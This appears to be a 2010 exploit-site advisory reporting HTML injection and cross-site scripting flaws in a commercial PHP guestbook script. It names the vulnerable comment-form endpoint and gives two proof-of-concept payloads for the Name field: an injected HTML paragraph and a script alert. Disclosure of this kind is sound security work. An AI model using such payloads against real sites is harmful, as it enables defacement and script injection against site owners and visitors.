Home / os / win7

GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabi

Posted on 15 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================== GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities ================================================================== =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ################################# # _____ __ __ /_ __/ # # / ___/ / / / / # # (__ ) / / / / # # /____/ \__/ /_/ # ################################# # Vendor: http://www.guestbookscripts.com/demo_guestbook.php # Date: 2010-08-15 # Author: AnTi SeCuRe # Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members .. # Contact: AnTi-SeCuRe@HoTMaiL.CoM # Home: WwW.Sa-ViRuS.CoM ######################################################################## [~]Note : Its not free ,, Its By 17,99 [~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php [~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new Add A New Comment And The exploit is in Name :) &lt;p align=&quot;center&quot;&gt;&lt;b&gt;Sa-ViRuS.CoM&lt;/b&gt;&lt;/p&gt; [~] Xss Vuln. : http://server/demo_guestbook.php?act=new Add A New Comment And The exploit is in Name :) &lt;script&gt;alert('AnTi SeCuRe - Sa-ViRuS.CoM')&lt;/script&gt; Thx To : Allah # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP